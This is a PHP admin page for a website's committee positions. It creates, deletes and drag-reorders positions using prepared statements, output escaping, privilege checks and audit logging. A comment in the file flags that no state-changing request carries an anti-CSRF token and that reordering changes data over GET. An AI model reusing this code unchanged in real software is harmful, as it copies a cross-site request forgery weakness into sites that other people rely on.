Current File : /home/atfycaf/www/admin//committeeEdit.php
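<?php
/**
 * Admin page for committee positions: create, delete, reorder and list them.
 *
 * Request handling:
 *  - GET  updateOrder + listOrder[] : store a new display order; no page output.
 *  - POST createPosition            : append a position (requires privilege 22).
 *  - POST deletePosition            : remove a position (requires privilege 24).
 *  - anything else                  : render the management page.
 *
 * $conn, $adminPriv, $adminID, $adminName, $adminEmail, $ADurl and cleanPost() are not
 * defined in this file; presumably globalVars.php provides them - verify.
 *
 * NOTE(review): none of the state-changing requests carries an anti-CSRF token, and
 * the reorder action changes data on a GET request. The session/token helpers are
 * not visible from this file, so this is flagged here rather than changed.
 */
include "globalVars.php";

// Loose in_array() is kept on purpose: the element type of $adminPriv is not visible here.
if (!in_array(22, $adminPriv) && !in_array(23, $adminPriv) && !in_array(24, $adminPriv)) {
	header("Location: $ADurl");
	// header() only queues the redirect; without exit the rest of the script would
	// still run for an unprivileged caller, including every database write below.
	exit;
}

/**
 * Run a write statement with every value bound as a string parameter.
 * Request data is never concatenated into SQL text. Returns true on success.
 */
$committeeRun = static function ($conn, $sql, array $params) {
	$stmt = mysqli_prepare($conn, $sql);
	if ($stmt === false) {
		error_log("committeeEdit: prepare failed: " . mysqli_error($conn));
		return false;
	}
	if (count($params) > 0) {
		mysqli_stmt_bind_param($stmt, str_repeat("s", count($params)), ...$params);
	}
	$ok = mysqli_stmt_execute($stmt);
	if (!$ok) {
		error_log("committeeEdit: execute failed: " . mysqli_stmt_error($stmt));
	}
	mysqli_stmt_close($stmt);
	return $ok;
};

/** Append one row to the userActions audit trail for this page. */
$committeeAudit = static function ($details) use ($conn, $adminID, $committeeRun) {
	return $committeeRun(
		$conn,
		"INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES (?, ?, 'admin/committeeEdit.html', 'committeeMembers', ?)",
		[date("Y-m-d H:i:s"), (string) $adminID, $details]
	);
};

/**
 * Escape a value for HTML text and attribute context.
 * double_encode is off because stored values may already contain entities
 * (cleanPost() is not visible here) - confirm against its implementation.
 */
$committeeEsc = static function ($value) {
	return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, "UTF-8", false);
};

// Audit text keeps the stored format of the existing rows: entity-encoded angle brackets.
$committeeActor = "The User $adminName &lt;$adminEmail&gt;";

if (isset($_GET["updateOrder"])) {
	// listOrder is expected to map position index => committee row id; anything else is ignored.
	$listOrder = (isset($_GET["listOrder"]) && is_array($_GET["listOrder"])) ? $_GET["listOrder"] : [];
	foreach ($listOrder as $orderCount => $committeeID) {
		if (!is_scalar($committeeID)) {
			continue;
		}
		$committeeRun(
			$conn,
			"UPDATE committeeMembers SET memberOrder = ? WHERE id = ?",
			[(string) $orderCount, (string) $committeeID]
		);
	}

	$committeeAudit("$committeeActor changed the order of the committee members on the website");

} else {

	include "header.php";

	if (isset($_POST["createPosition"])) {
		// The create form is only rendered for privilege 22; enforce the same rule
		// on the server, since a request can be sent without using the form.
		if (in_array(22, $adminPriv)) {
			$memberPosition	= cleanPost($_POST["memberPosition"] ?? "", $conn);

			if (trim((string) $memberPosition) !== "") {
				$committeeOrderQuery = mysqli_query($conn, "SELECT memberOrder FROM committeeMembers ORDER BY memberOrder DESC LIMIT 0,1");
				if ($committeeOrderQuery === false) {
					// Keep driver detail in the server log instead of the response.
					error_log("committeeEdit: " . mysqli_error($conn));
					die("Database error.");
				}
				// An empty table yields no row, so start from 0 and the first position gets order 1.
				$memberOrder	= 0;
				while ($cQ = mysqli_fetch_array($committeeOrderQuery)) {
					$memberOrder	= (int) $cQ["memberOrder"];
				}
				$nextOrder	= $memberOrder + 1;

				$committeeRun(
					$conn,
					"INSERT INTO committeeMembers (memberOrder, memberPosition) VALUES (?, ?)",
					[(string) $nextOrder, (string) $memberPosition]
				);

				$committeeAudit("$committeeActor added the new committee position $memberPosition");
			}
		}

	} elseif (isset($_POST["deletePosition"])) {
		// The delete button is only rendered for privilege 24; enforce it here as well.
		if (in_array(24, $adminPriv)) {
			$commID		= $_POST["commID"] ?? "";

			if (is_scalar($commID) && (string) $commID !== "") {
				$commIDParam	= (string) $commID;

				// Read the title of the row being deleted so the audit entry names that
				// position, not whichever row happens to be last in display order.
				$memberPosition	= null;
				$lookup = mysqli_prepare($conn, "SELECT memberPosition FROM committeeMembers WHERE id = ?");
				if ($lookup === false) {
					error_log("committeeEdit: prepare failed: " . mysqli_error($conn));
				} else {
					mysqli_stmt_bind_param($lookup, "s", $commIDParam);
					if (mysqli_stmt_execute($lookup)) {
						mysqli_stmt_bind_result($lookup, $foundPosition);
						if (mysqli_stmt_fetch($lookup)) {
							$memberPosition	= (string) $foundPosition;
						}
					} else {
						error_log("committeeEdit: execute failed: " . mysqli_stmt_error($lookup));
					}
					mysqli_stmt_close($lookup);
				}

				// Delete and log only when the row exists, so the audit trail never
				// records a deletion that did not happen.
				if ($memberPosition !== null) {
					if ($committeeRun($conn, "DELETE FROM committeeMembers WHERE id = ?", [$commIDParam])) {
						$committeeAudit("$committeeActor deleted the committee position $memberPosition");
					}
				}
			}
		}

	}
	?>

				<h2>Update the Committee Members</h2>

	<?php
	if (in_array(22, $adminPriv)) {
		?>
	<div class="descStTab" style="margin-bottom:40px;">
		<h3>Create a new Committee Position</h3>
		<form action="committeeEdit.html" method="post">
			<div class="pFormRow">
				<div class="pFormTitle">Position Title:</div>
				<div class="pFormInput">
					<input type="text" name="memberPosition" size="50" required />
					<div class="pFormLabel">
						<label class="labelName">Position Title:</label>
					</div>
				</div>
			</div>
			<input type="submit" class="submitButton" name="createPosition" value="Create this Position" />
		</form>
	</div>
		<?php
	}
	?>
	<div class="descStTab" style="margin-bottom:40px;">
		<h3>Current Committee Members</h3>
		<p>To change the order the committee members appear on the website simply click and hold the <i class="fas fa-grip-horizontal"></i> next to the member and drag them to where you want and release.</p>
		<ul id="committeeSortable">
	<?php
	$committeeQuery = mysqli_query($conn, "SELECT * FROM committeeMembers ORDER BY memberOrder ASC");
	if ($committeeQuery === false) {
		error_log("committeeEdit: " . mysqli_error($conn));
		die("Database error.");
	}
	while ($cQ = mysqli_fetch_array($committeeQuery)) {
		// Everything read from the database is escaped before it reaches the markup,
		// both in element text and inside the data-* / value attributes.
		$commID			= $committeeEsc($cQ["id"]);
		$memberName		= (string) $cQ["memberName"];
		$memberPosition	= $committeeEsc($cQ["memberPosition"]);
		if (trim($memberName) === "") {
			$memberName	= "T.B.A.";
		}
		$memberName		= $committeeEsc($memberName);
		?>
			<li class="committeeRow" data-cid="<?php echo $commID ?>">
				<i class="fas fa-grip-horizontal"></i>
				<div class="pFormEditTitle">
					<?php echo $memberPosition ?><br><br>
					<span style="font-weight:400; font-size:14px;"><?php echo $memberName ?></span>
				</div>
				<div class="pFormEditButtons">
				<?php
				if (in_array(23, $adminPriv)) {
					?>
					<form action="committeeEditU.html" method="post">
						<input type="hidden" name="commID" value="<?php echo $commID ?>">
						<button class="submitButton" name="getMember">Edit Position</button>
					</form>
					<?php
				}
				if (in_array(24, $adminPriv)) {
					?>
					<button type="button" class="deleteButton deleteConfirm" data-cid="<?php echo $commID ?>" data-cn="<?php echo $memberPosition ?>">Delete Position</button>
					<?php
				}
				?>
				</div>
			</li>
		<?php
	}
	?>
		</ul>
	</div>

	<div id="deleteConfirmPop" class="deletePop">
		<div class="deletePopBG">
			<div class="deletePopContainer">
				<h4>Confirm Delete</h4>
				<p>Are you sure you want to delete the Committee Position <span id="memberNameC"></span>?</p>
				<form action="committeeEdit.html" method="post">
					<input type="hidden" name="commID" id="cidInputC" value="">
					<div class="pForm50">
						<button type="button" class="submitButton cancelDeleteC">No</button>
					</div>
					<div class="pForm50">
						<button class="deleteButton" name="deletePosition">Yes, Delete it</button>
					</div>
				</form>
			</div>
		</div>
	</div>
	<?php
	include "footer.php";
}
?>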
